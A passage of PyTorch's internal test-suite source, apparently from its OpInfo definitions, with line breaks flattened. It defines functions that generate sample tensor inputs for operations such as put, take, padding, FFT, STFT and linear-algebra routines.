dtype=torch.long, device=device) yield SampleInput(input, args=(0, idx, src, 'prod'), kwargs={'include_self': True}) def sample_inputs_mode(op_info, device, dtype, requires_grad, **kwargs): inputs = [] args = ( ((S, S, S), (),), ((S, S, S), (1, ),), ((S, S, S), (1, True, ),), ((), (),), ((), (0,),), ((), (0, True,),), ) inputs = list((SampleInput(make_tensor(input_tensor, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=args,)) for input_tensor, args in args) return inputs # Missing to test the nondeterminism of the operation # https://github.com/pytorch/pytorch/issues/53352 def sample_inputs_put(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) make_idx = partial(make_tensor, low=0, dtype=torch.int64, device=device, requires_grad=False) S = 3 # Generic inputs idx = torch.randperm(S * S, device=device, dtype=torch.int64)[:S] idx_list = [idx, -idx - 1] for idx, acc in product(idx_list, (True, False)): yield SampleInput(input=make_arg((S, S)), args=(idx.clone(), make_arg((S,)), acc)) # Scalar cases scalar_sizes = [(), (1,)] tgt_gen = (make_arg(size) for size in scalar_sizes) idx_gen = (make_idx(size, high=1) for size in scalar_sizes) src_gen = (make_arg(size) for size in scalar_sizes) for tgt, idx, src, acc in product(tgt_gen, idx_gen, src_gen, (True, False)): yield SampleInput(input=tgt.clone().requires_grad_(requires_grad), args=(idx.clone(), src.clone().requires_grad_(requires_grad), acc)) # Empty cases tgt_sizes = [(0,), (), (1,), (3, 2)] tgt_gen = (make_arg(size) for size in tgt_sizes) idx = make_idx((0,), high=1) src = make_arg((0,)) for tgt, acc in product(tgt, (True, False)): yield SampleInput(input=tgt.clone().requires_grad_(requires_grad), args=(idx.clone(), src.clone().requires_grad_(requires_grad), acc)) def sample_inputs_take(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) make_idx = partial(make_tensor, low=0, dtype=torch.int64, device=device, requires_grad=False) S = 3 # Generic inputs: take S elements out of S * S index = make_idx((S,), high=(S * S)) for idx in (index, -index - 1): yield SampleInput(input=make_arg((S, S)), args=(idx,)) # Scalar cases scalar_sizes = [(), (1,)] src_gen = (make_arg(size) for size in scalar_sizes) idx_gen = (make_idx(size, high=1) for size in scalar_sizes) for src, idx in product(src_gen, idx_gen): yield SampleInput(input=src.clone().requires_grad_(requires_grad), args=(idx.clone(),)) # Empty cases src_sizes = [(0,), (), (1,), (3, 2)] src_gen = (make_arg(size) for size in src_sizes) idx = make_idx((0,), high=1) for src in src_gen: yield SampleInput(input=src.clone().requires_grad_(requires_grad), args=(idx.clone(),)) def sample_movedim_moveaxis(op_info, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((4, 3, 2, 1), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([0, 1, 2, 3], [3, 2, 1, 0])), SampleInput( make_tensor((4, 3, 2, 1), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([0, -1, -2, -3], [-3, -2, -1, -0])) ) def sample_repeat_tile(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) rep_dims = ((), (0, ), (1, ), (0, 2), (1, 1), (2, 3), (2, 3, 2), (0, 2, 3), (2, 1, 1, 1),) shapes = ((), (0,), (2,), (3, 0), (3, 2), (3, 0, 1)) if requires_grad: # Tests for variant_consistency_jit, grad, gradgrad # are slower. Use smaller bags of `rep_dims` and `shapes` # in this case. rep_dims = ((), (0, ), (0, 2), (1, 1), (2, 3), (1, 3, 2), (3, 1, 1)) # type: ignore[assignment] shapes = ((), (0,), (2,), (3, 2)) # type: ignore[assignment] samples = [] for rep_dim, shape in product(rep_dims, shapes): # `torch.repeat` errors for `len(rep_dims) < t.dim()`, # so we filter such combinations. if op_info.name == 'repeat' and len(rep_dim) < len(shape): continue samples.append(SampleInput(make_arg(shape), args=(rep_dim,),)) return samples def sample_inputs_narrow(op_info, device, dtype, requires_grad, **kwargs): shapes_and_args = ( ((S, S, S), (1, 2, 2)), ((S, S, S), (-1, 2, 2)), ((S, S, S), (1, 0, 0)), ((S, S, S), (-1, 0, 0)), ((S, S, S), (2, 1, 2)), ) for shape, args in shapes_and_args: tensor = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) yield SampleInput(tensor, args=args) def sample_trapezoid(op_info, device, dtype, requires_grad, **kwargs): y_shape_x_shape_and_kwargs = [ ((2, 3), (2, 3), {}), ((2, 3), (2, 3), {'dim': 1}), ((6,), (6,), {}), ((6,), None, {}), # When 'trapezoid' is called with an empty input, it does not produce an output with requires_grad # See Issue #{61619} # ((6,0), (6,0), {}), ((2, 3), (1, 3), {}), ((3, 3), (3, 3), {}), ((3, 3), (3, 3), {'dim': -2}), ((5,), None, {'dx': 2.0}), ((2, 2), None, {'dx': 3.0}) ] samples = [] for y_shape, x_shape, kwarg in y_shape_x_shape_and_kwargs: y_tensor = make_tensor(y_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if x_shape is not None: x_tensor = make_tensor(x_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(y_tensor, args=(x_tensor,), kwargs=kwarg)) else: samples.append(SampleInput(y_tensor, kwargs=kwarg)) return samples def sample_cumulative_trapezoid(op_info, device, dtype, requires_grad, **kwargs): y_shape_x_shape_and_kwargs = [ ((2, 3), (2, 3), {}), ((2, 3), (2, 3), {'dim': 1}), ((6,), (6,), {}), ((6,), None, {}), # When 'cumulative_trapezoid' is called with an empty input, it does not produce an output with requires_grad # See Issue #{61619} # ((6,0), (6,0), {}), ((2, 3), (1, 3), {}), ((3, 3), (3, 3), {}), ((3, 3), (3, 3), {'dim': -2}), ((5,), None, {'dx': 2.0}), ((2, 2), None, {'dx': 3.0}) ] samples = [] for y_shape, x_shape, kwarg in y_shape_x_shape_and_kwargs: y_tensor = make_tensor(y_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if x_shape is not None: x_tensor = make_tensor(x_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(y_tensor, args=(x_tensor,), kwargs=kwarg)) else: samples.append(SampleInput(y_tensor, kwargs=kwarg)) return samples def sample_unsqueeze(op_info, device, dtype, requires_grad, **kwargs): shapes_and_axes = [ ((3, 4, 5), 0), ((3, 4, 5), 1), ((3, 4, 5), 3), ((3, 4, 5), -1), ((3, 4, 5), -3), ((), 0), ((), -1), ((1,), 0), ((1,), -1), ] samples = [] for shape, axis in shapes_and_axes: tensor = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(tensor, args=(axis,),)) return samples def sample_inputs_nn_unfold(op_info, device, dtype, requires_grad, **kwargs): shapes = ((0, 1, 5, 5), (1, 1, 5, 5), (2, 3, 5, 5)) kernel_sizes = (2, (2, 2), (3, 3)) dilations = (1, 2, (1, 2)) paddings = (0, 1, (1, 1)) strides = (1, 2, (1, 2)) cases = product(shapes, kernel_sizes, dilations, paddings, strides) for shape, kernel_size, dilation, padding, stride in cases: tensor = make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(tensor, args=(kernel_size, dilation, padding, stride)) # With default args yield SampleInput(make_tensor((1, 1, 5, 5), dtype=dtype, device=device, requires_grad=requires_grad), args=((3, 3),)) def sample_inputs_squeeze(op_info, device, dtype, requires_grad, **kwargs): shapes_and_args = ( ((S, 1, S, 1), ()), ((1, 1, 1, 1), ()), ((S, 1, S, 1), (1,)), ((S, 1, S, 1), (-1,)), ((S, 1, S, 1), (2,)), ((S, 1, S, 1), (-2,)), ((), (0, )), ) for shape, args in shapes_and_args: tensor = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) yield SampleInput(tensor, args=args) def sample_inputs_nn_pad(op_info, device, dtype, requires_grad, mode, **kwargs): assert mode in ('constant', 'reflect', 'replicate', 'circular') if mode in ['reflect', 'replicate']: cases: tuple = ( # ignore ((1, 3), (1, 2)), ((1, 3), (0, 1)), ((0, 3, 3), (1, 2)), ((0, 3, 3), (0, 1)), ((1, 3, 3), (1, 2)), ((1, 3, 3), (0, 1)), ((1, 3, 3), (0, 2, 0, 1)), ((0, 3, 3, 3), (0, 2, 0, 1)), ((3, 3, 5, 5), (0, 2, 0, 1)), ((3, 3, 5, 5), (1, 1, 1, 1, 1, 1)), ((1, 3, 3, 3, 3), (1, 1, 1, 1, 1, 1)), ((1, 3, 4, 4), (-1, 1, -2, 1)), ) elif mode == 'constant': cases = ( ((1, 3), (1, 2)), ((1, 3), (0, 1)), ((1, 3), (0, 2, 0, 1)), ((0, 3, 3), (1, 2)), ((0, 3, 3), (0, 1)), ((0, 3, 3), (0, 2, 0, 1)), ((0, 3, 3), (1, 1, 1, 1, 1, 1)), ((1, 3, 3), (1, 2)), ((1, 3, 3), (0, 1)), ((1, 3, 3), (0, 2, 0, 1)), ((1, 3, 3), (1, 1, 1, 1, 1, 1)), ((0, 3, 3, 3), (1, 2)), ((0, 3, 3, 3), (0, 1)), ((0, 3, 3, 3), (0, 2, 0, 1)), ((0, 3, 3, 3), (1, 1, 1, 1, 1, 1)), ((3, 3, 5, 5), (1, 2)), ((3, 3, 5, 5), (0, 1)), ((3, 3, 5, 5), (0, 2, 0, 1)), ((3, 3, 5, 5), (1, 1, 1, 1, 1, 1)), ((1, 3, 3, 3, 3), (1, 2)), ((1, 3, 3, 3, 3), (0, 1)), ((1, 3, 3, 3, 3), (0, 2, 0, 1)), ((1, 3, 3, 3, 3), (1, 1, 1, 1, 1, 1)), ((1, 3, 4, 4), (-1, 1, -2, 1)), ) else: # mode == 'circular' if dtype == torch.bool: # test_dtypes fails on ASAN with for the case ab # runtime error: load of value 190, which is not a valid value for type 'bool' # Reference: https://github.com/pytorch/pytorch/pull/62814#issuecomment-894156562 # Reference Issue: https://github.com/pytorch/pytorch/issues/63034 cases = ( ((2, 3, 3), (1, 2)), ((1, 3, 3), (1, 2)), ) else: cases = ( ((0, 3, 3), (1, 2)), ((0, 3, 3), (0, 1)), ((1, 3, 3), (1, 2)), ((1, 3, 3), (0, 1)), ((0, 3, 3, 3), (0, 2, 0, 1)), ((3, 3, 5, 5), (0, 2, 0, 1)), ((1, 3, 3, 3, 3), (1, 1, 1, 1, 1, 1)), ((1, 3, 4, 4), (-1, 1, -2, 1)), ) make_inp = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) if mode == 'constant': # Default args yield SampleInput(make_inp((1, 3, 3)), args=((2, 2),)) if mode in ['reflect', 'replicate', 'circular']: for shape, pad in cases: yield SampleInput(make_inp(shape), args=(pad, mode)) else: # mode == 'constant' for pad_value in (1., 2.): for shape, pad in cases: yield SampleInput(make_inp(shape), args=(pad, mode, pad_value)) # TODO: reconcile with torch.linalg.det and torch.linalg.slogdet # Creates matrices with a positive nonzero determinant def sample_inputs_logdet(op_info, device, dtype, requires_grad, **kwargs): def make_nonzero_det(A, *, sign=1, min_singular_value=0.1, **kwargs): u, s, vh = torch.linalg.svd(A, full_matrices=False) s.clamp_(min=min_singular_value) A = (u * s.unsqueeze(-2)) @ vh det = A.det() if sign is not None: if A.dim() == 2: if (det < 0) ^ (sign < 0): A[0, :].neg_() else: cond = ((det < 0) ^ (sign < 0)).nonzero() if cond.size(0) > 0: for i in range(cond.size(0)): A[list(cond[i])][0, :].neg_() return A # cases constructed using make_tensor() tensor_shapes = ( (S, S), (1, 1), (3, 3, S, S), (3, 3, 1, 1) ) for shape in tensor_shapes: t = make_tensor(shape, device=device, dtype=dtype) d = make_nonzero_det(t).requires_grad_(requires_grad) yield SampleInput(d) # cases constructed using: # 1) make_symmetric_matrices # 2) make_symmetric_pd_matrices # 3) make_fullrank_matrices_with_distinct_singular_values symmetric_shapes = ( (S, S), (3, S, S), ) def _helper(constructor, *shape, **kwargs): t = constructor(*shape, device=device, dtype=dtype) d = make_nonzero_det(t, **kwargs).requires_grad_(requires_grad) yield SampleInput(d) for shape in symmetric_shapes: _helper(make_symmetric_matrices, *shape) _helper(make_symmetric_pd_matrices, *shape) _helper(make_fullrank_matrices_with_distinct_singular_values, *shape, min_singular_value=0) def np_unary_ufunc_integer_promotion_wrapper(fn): # Wrapper that passes PyTorch's default scalar # type as an argument to the wrapped NumPy # unary ufunc when given an integer input. # This mimicks PyTorch's integer->floating point # type promotion. # # This is necessary when NumPy promotes # integer types to double, since PyTorch promotes # integer types to the default scalar type. # Helper to determine if promotion is needed def is_integral(dtype): return dtype in [np.bool_, bool, np.uint8, np.int8, np.int16, np.int32, np.int64] @wraps(fn) def wrapped_fn(x): # As the default dtype can change, acquire it when function is called. # NOTE: Promotion in PyTorch is from integer types to the default dtype np_dtype = torch_to_numpy_dtype_dict[torch.get_default_dtype()] if is_integral(x.dtype): return fn(x.astype(np_dtype)) return fn(x) return wrapped_fn def sample_inputs_spectral_ops(self, device, dtype, requires_grad=False, **kwargs): is_fp16_or_chalf = dtype == torch.complex32 or dtype == torch.half if not is_fp16_or_chalf: nd_tensor = partial(make_tensor, (S, S + 1, S + 2), device=device, dtype=dtype, requires_grad=requires_grad) oned_tensor = partial(make_tensor, (31,), device=device, dtype=dtype, requires_grad=requires_grad) else: # cuFFT supports powers of 2 for half and complex half precision # NOTE: For hfft, hfft2, hfftn, irfft, irfft2, irfftn with default args # where output_size n=2*(input_size - 1), we make sure that logical fft size is a power of two if self.name in ['fft.hfft', 'fft.irfft']: shapes = ((2, 9, 9), (33,)) elif self.name in ['fft.hfft2', 'fft.irfft2']: shapes = ((2, 8, 9), (33,)) elif self.name in ['fft.hfftn', 'fft.irfftn']: shapes = ((2, 2, 33), (33,)) else: shapes = ((2, 8, 16), (32,)) nd_tensor = partial(make_tensor, shapes[0], device=device, dtype=dtype, requires_grad=requires_grad) oned_tensor = partial(make_tensor, shapes[1], device=device, dtype=dtype, requires_grad=requires_grad) if self.ndimensional == SpectralFuncType.ND: return [ SampleInput(nd_tensor(), kwargs=dict(s=(3, 10) if not is_fp16_or_chalf else (4, 8), dim=(1, 2), norm='ortho')), SampleInput(nd_tensor(), kwargs=dict(norm='ortho')), SampleInput(nd_tensor(), kwargs=dict(s=(8,))), SampleInput(oned_tensor()), *(SampleInput(nd_tensor(), kwargs=dict(dim=dim)) for dim in [-1, -2, -3, (0, -1)]), ] elif self.ndimensional == SpectralFuncType.TwoD: return [ SampleInput(nd_tensor(), kwargs=dict(s=(3, 10) if not is_fp16_or_chalf else (4, 8), dim=(1, 2), norm='ortho')), SampleInput(nd_tensor(), kwargs=dict(norm='ortho')), SampleInput(nd_tensor(), kwargs=dict(s=(6, 8) if not is_fp16_or_chalf else (4, 8))), SampleInput(nd_tensor(), kwargs=dict(dim=0)), SampleInput(nd_tensor(), kwargs=dict(dim=(0, -1))), SampleInput(nd_tensor(), kwargs=dict(dim=(-3, -2, -1))), ] else: return [ SampleInput(nd_tensor(), kwargs=dict(n=10 if not is_fp16_or_chalf else 8, dim=1, norm='ortho')), SampleInput(nd_tensor(), kwargs=dict(norm='ortho')), SampleInput(nd_tensor(), kwargs=dict(n=7 if not is_fp16_or_chalf else 8) ), SampleInput(oned_tensor()), *(SampleInput(nd_tensor(), kwargs=dict(dim=dim)) for dim in [-1, -2, -3]), ] def sample_inputs_repeat_interleave(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return [ SampleInput(make_input(()), kwargs=dict(repeats=2)), SampleInput(make_input((2, 3, 4)), kwargs=dict(repeats=2)), SampleInput(make_input((2, 3, 4)), kwargs=dict(repeats=2, dim=1)), SampleInput(make_input((2, 3, 4)), kwargs=dict(repeats=torch.arange(3, device=device), dim=1)) ] SpectralFuncType = Enum('SpectralFuncType', ('OneD', 'TwoD', 'ND')) # Metadata class for Fast Fourier Transforms in torch.fft. class SpectralFuncInfo(OpInfo): """Operator information for torch.fft transforms. """ def __init__(self, name, # the string name of the function *, ref=None, # Reference implementation (probably in np.fft namespace) dtypes=floating_and_complex_types(), ndimensional: SpectralFuncType, sample_inputs_func=sample_inputs_spectral_ops, decorators=None, **kwargs): decorators = list(decorators) if decorators is not None else [] decorators += [ skipCPUIfNoFFT, DecorateInfo(toleranceOverride({torch.chalf: tol(4e-2, 4e-2)}), "TestCommon", "test_complex_half_reference_testing") ] super().__init__(name=name, dtypes=dtypes, decorators=decorators, sample_inputs_func=sample_inputs_func, **kwargs) self.ref = ref self.ndimensional = ndimensional def sample_inputs_stft(op_info, device, dtype, requires_grad, **kwargs): def mt(shape, **kwargs): return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs) yield SampleInput(mt(100), kwargs=dict(n_fft=10)) for center in [False, True]: yield SampleInput(mt(10), kwargs=dict(n_fft=7, center=center)) yield SampleInput(mt((10, 100)), kwargs=dict(n_fft=16, hop_length=4, center=center)) window = make_tensor(16, low=.5, high=2.0, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput( mt((2, 100)), kwargs=dict(n_fft=16, window=window, return_complex=True, center=center)) yield SampleInput( mt((3, 100)), kwargs=dict(n_fft=16, window=window, return_complex=True, center=center)) if not dtype.is_complex: yield SampleInput( mt((10, 100)), kwargs=dict(n_fft=16, window=window, onesided=False)) def sample_inputs_istft(op_info, device, dtype, requires_grad, **kwargs): def mt(shape, **kwargs): real_shape = shape if dtype.is_complex else shape + (2,) return make_tensor(real_shape, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs) yield SampleInput(mt((10, 2)), kwargs=dict(n_fft=10)) yield SampleInput(mt((6, 3)), kwargs=dict(n_fft=6, onesided=False)) yield SampleInput(mt((6, 4)), kwargs=dict(n_fft=10, onesided=True)) for center in [False, True]: yield SampleInput(mt((10, 10, 6)), kwargs=dict(n_fft=10, center=center)) yield SampleInput(mt((1, 9, 10)), kwargs=dict(n_fft=16, hop_length=4, center=center)) window = make_tensor(10, low=.5, high=2.0, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(mt((10, 10, 6)), kwargs=dict( n_fft=10, window=window, center=center, return_complex=dtype.is_complex)) yield SampleInput(mt((10, 10, 10)), kwargs=dict( n_fft=10, window=window[:8], win_length=8, center=center, return_complex=True)) real_window = window if not dtype.is_complex else window.real yield SampleInput(mt((10, 5, 6)), kwargs=dict(n_fft=8, window=real_window[:8], center=center)) def sample_inputs_fftshift(op_info, device, dtype, requires_grad, **kwargs): def mt(shape, **kwargs): return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs) yield SampleInput(mt((9, 10))) yield SampleInput(mt((50,)), kwargs=dict(dim=0)) yield SampleInput(mt((5, 11)), kwargs=dict(dim=(1,))) yield SampleInput(mt((5, 6)), kwargs=dict(dim=(0, 1))) yield SampleInput(mt((5, 6, 2)), kwargs=dict(dim=(0, 2))) class ShapeFuncInfo(OpInfo): """Early version of a specialized OpInfo for Shape manipulating operations like tile and roll""" def __init__(self, name, # the string name of the function *, ref, # a reference function dtypes=floating_types(), dtypesIfCUDA=None, dtypesIfROCM=None, sample_inputs_func=None, **kwargs): super(ShapeFuncInfo, self).__init__(name, dtypes=dtypes, dtypesIfCUDA=dtypesIfCUDA, dtypesIfROCM=dtypesIfROCM, sample_inputs_func=sample_inputs_func, **kwargs) self.ref = ref def sample_inputs_foreach(self, device, dtype, N, *, noncontiguous=False, same_size=False, low=None, high=None): if same_size: return [make_tensor((N, N), dtype=dtype, device=device, noncontiguous=noncontiguous) for _ in range(N)] else: return [make_tensor((N - i, N - i), dtype=dtype, device=device, noncontiguous=noncontiguous) for i in range(N)] def get_foreach_method_names(name): # get torch inplace reference function op_name = "_foreach_" + name inplace_op_name = "_foreach_" + name + "_" op = getattr(torch, op_name, None) inplace_op = getattr(torch, inplace_op_name, None) ref = getattr(torch, name, None) ref_inplace = getattr(torch.Tensor, name + "_", None) return op, inplace_op, ref, ref_inplace class ForeachFuncInfo(OpInfo): """Early version of a specialized OpInfo for foreach functions""" def __init__(self, name, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half), dtypesIfROCM=None, supports_alpha_param=False, sample_inputs_func=sample_inputs_foreach, **kwargs): super().__init__( "_foreach_" + name, dtypes=dtypes, dtypesIfCUDA=dtypesIfCUDA, dtypesIfROCM=dtypesIfROCM, sample_inputs_func=sample_inputs_func, **kwargs ) foreach_method, foreach_method_inplace, torch_ref_method, torch_ref_inplace = get_foreach_method_names(name) self.method_variant = foreach_method self.inplace_variant = foreach_method_inplace self.ref = torch_ref_method self.ref_inplace = torch_ref_inplace self.supports_alpha_param = supports_alpha_param if name == "norm": self.ref = torch.linalg.vector_norm def sample_inputs_linalg_cholesky_inverse(op_info, device, dtype, requires_grad=False, **kwargs): from torch.testing._internal.common_utils import random_well_conditioned_matrix # Cholesky factorization is for positive-definite matrices single_well_conditioned_matrix = random_well_conditioned_matrix(S, S, dtype=dtype, device=device) batch_well_conditioned_matrices = random_well_conditioned_matrix(2, S, S, dtype=dtype, device=device) single_pd = single_well_conditioned_matrix @ single_well_conditioned_matrix.mH batch_pd = batch_well_conditioned_matrices @ batch_well_conditioned_matrices.mH inputs = ( torch.zeros(0, 0, dtype=dtype, device=device), # 0x0 matrix torch.zeros(0, 2, 2, dtype=dtype, device=device), # zero batch of matrices single_pd, batch_pd ) test_cases = (torch.linalg.cholesky(a, upper=False) for a in inputs) for l in test_cases: # generated lower-triangular samples l.requires_grad = requires_grad yield SampleInput(l) # upper=False by default yield SampleInput(l.detach().clone().requires_grad_(requires_grad), kwargs=dict(upper=False)) # generate upper-triangular inputs u = l.detach().clone().mT.contiguous().requires_grad_(requires_grad) yield SampleInput(u, kwargs=dict(upper=True)) def sample_inputs_linalg_ldl_factor(op_info, device, dtype, requires_grad=False, **kwargs): from torch.testing._internal.common_utils import ( random_hermitian_pd_matrix, random_symmetric_pd_matrix, ) device = torch.device(device) # Symmetric inputs yield SampleInput( random_symmetric_pd_matrix(S, dtype=dtype, device=device), kwargs=dict(hermitian=False), ) # single matrix yield SampleInput( random_symmetric_pd_matrix(S, 2, dtype=dtype, device=device), kwargs=dict(hermitian=False), ) # batch of matrices yield SampleInput( torch.zeros(0, 0, dtype=dtype, device=device), kwargs=dict(hermitian=False) ) # 0x0 matrix yield SampleInput( torch.zeros(0, 2, 2, dtype=dtype, device=device), kwargs=dict(hermitian=False) ) # zero batch of matrices # Hermitian inputs # hermitian=True for complex inputs on CUDA is supported only with MAGMA 2.5.4+ magma_254_available = device.type == 'cuda' and _get_magma_version() >= (2, 5, 4) if dtype.is_complex and (device.type == 'cpu' or magma_254_available): yield SampleInput( random_hermitian_pd_matrix(S, dtype=dtype, device=device), kwargs=dict(hermitian=True), ) # single matrix yield SampleInput( random_hermitian_pd_matrix(S, 2, dtype=dtype, device=device), kwargs=dict(hermitian=True), ) # batch of matrices def sample_inputs_linalg_ldl_solve(op_info, device, dtype, requires_grad=False, **kwargs): # Generate LDL factors of symmetric (and Hermitian on CPU) matrices from torch.testing._internal.common_utils import random_hermitian_pd_matrix, random_symmetric_pd_matrix device = torch.device(device) symmetric_inputs = ( random_symmetric_pd_matrix(S, dtype=dtype, device=device), # single matrix random_symmetric_pd_matrix(S, 2, dtype=dtype, device=device), # batch of matrices torch.zeros(0, 0, dtype=dtype, device=device), # 0x0 matrix torch.zeros(0, 2, 2, dtype=dtype, device=device), # zero batch of matrices ) hermitian_inputs = ( random_hermitian_pd_matrix(S, dtype=dtype, device=device), random_hermitian_pd_matrix(S, 2, dtype=dtype, device=device), ) if device.type == 'cpu' and dtype.is_complex else () test_cases1 = (torch.linalg.ldl_factor_ex(a, hermitian=False) for a in symmetric_inputs) test_cases2 = (torch.linalg.ldl_factor_ex(a, hermitian=True) for a in hermitian_inputs) # Symmetric case for test_case in test_cases1: factors, pivots, _ = test_case factors.requires_grad = requires_grad for B_batch_shape in ((), factors.shape[:-2]): B = make_tensor((*B_batch_shape, factors.shape[-1], S), device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(factors, args=(pivots, B), kwargs=dict(hermitian=False)) clone_factors = factors.detach().clone().requires_grad_(requires_grad) yield SampleInput(clone_factors, args=(pivots, B), kwargs=dict(hermitian=False)) # Hermitian case for test_case in test_cases2: factors, pivots, _ = test_case factors.requires_grad = requires_grad for B_batch_shape in ((), factors.shape[:-2]): B = make_tensor((*B_batch_shape, factors.shape[-1], S), device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(factors, args=(pivots, B), kwargs=dict(hermitian=True)) clone_factors = factors.detach().clone().requires_grad_(requires_grad) yield SampleInput(clone_factors, args=(pivots, B), kwargs=dict(hermitian=True)) def sample_inputs_linalg_lstsq(op_info, device, dtype, requires_grad=False, **kwargs): from torch.testing._internal.common_utils import random_well_conditioned_matrix device = torch.device(device) drivers: Tuple[str, ...] if device.type == 'cuda': drivers = ('gels',) else: drivers = ('gels', 'gelsy', 'gelss', 'gelsd') # we generate matrices of shape (..., n + delta, n) deltas: Tuple[int, ...] if device.type == 'cpu' or has_cusolver(): deltas = (-1, 0, +1) # only square systems if Cusolver is not available # becase we solve a lstsq problem with a transposed matrix in the backward else: deltas = (0,) out = [] for batch, driver, delta in product(((), (3,), (3, 3)), drivers, deltas): shape = batch + (3 + delta, 3) a = random_well_conditioned_matrix(*shape, dtype=dtype, device=device) a.requires_grad_(requires_grad) b = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) out.append(SampleInput(a, args=(b,), kwargs=dict(driver=driver))) return out def sample_inputs_householder_product(op_info, device, dtype, requires_grad, **kwargs): """ This function generates input for torch.linalg.householder_product (torch.orgqr). The first argument should be a square matrix or batch of square matrices, the second argument is a vector or batch of vectors. Empty, square, rectangular, batched square and batched rectangular input is generated. """ # Each column of the matrix is getting multiplied many times leading to very large values for # the Jacobian matrix entries and making the finite-difference result of grad check less accurate. # That's why gradcheck with the default range [-9, 9] fails and [-2, 2] is used here. samples = ( SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)), SampleInput(make_tensor((S + 1, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)), SampleInput(make_tensor((2, 1, S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((2, 1, S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)), SampleInput(make_tensor((2, 1, S + 1, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((2, 1, S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)), SampleInput(make_tensor((0, 0), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(make_tensor((0,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)), SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((0,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)), # m = n = S, k = S - 2 SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((S - 2,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)), # m = S, n = S -1, k = S - 2 SampleInput(make_tensor((S, S - 1), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad), args=(make_tensor((S - 2,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)), ) return samples def sample_inputs_ormqr(op_info, device, dtype, requires_grad, **kwargs): # create a helper function wrapping `make_tensor` make_input = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) def gen_inputs(): batches = [(), (0, ), (2, ), (2, 1)] ns = [5, 2, 0] tf = [True, False] for batch, (m, n), left, transpose in product(batches, product(ns, ns), tf, tf): reflectors = make_input((*batch, m, n)) tau = make_input((*batch, min(m, n))) other_matrix_shape = (m, n) if left else (n, m) other = make_input((*batch, *other_matrix_shape)) kwargs = {"left": left, "transpose": transpose} yield SampleInput(reflectors, args=(tau, other,), kwargs=kwargs) return tuple(gen_inputs()) def sample_inputs_linalg_cholesky(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates always positive-definite input for torch.linalg.cholesky using random_hermitian_pd_matrix. The input is generated as the itertools.product of 'batches' and 'ns'. In total this function generates 8 SampleInputs 'batches' cases include: () - single input, (0,) - zero batched dimension, (2,) - batch of two matrices, (1, 1) - 1x1 batch of matrices 'ns' gives 0x0 and 5x5 matrices. Zeros in dimensions are edge cases in the implementation and important to test for in order to avoid unexpected crashes. """ from torch.testing._internal.common_utils import random_hermitian_pd_matrix batches = [(), (0, ), (2, ), (1, 1)] ns = [5, 0] out = [] for batch, n, upper in product(batches, ns, [True, False]): a = random_hermitian_pd_matrix(n, *batch, dtype=dtype, device=device) a.requires_grad = requires_grad out.append(SampleInput(a, kwargs={"upper": upper})) return out def sample_inputs_symeig(op_info, device, dtype, requires_grad=False, **kwargs): out = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad) for o in out: o.kwargs = {"upper": bool(np.random.choice([True, False])), "eigenvectors": True} # A gauge-invariant function o.output_process_fn_grad = lambda output: (output[0], abs(output[1])) yield o def sample_inputs_linalg_eig(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.eig """ def out_fn(output): return output[0], abs(output[1]) samples = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad) for sample in samples: sample.output_process_fn_grad = out_fn yield sample def sample_inputs_linalg_eigh(op_info, device, 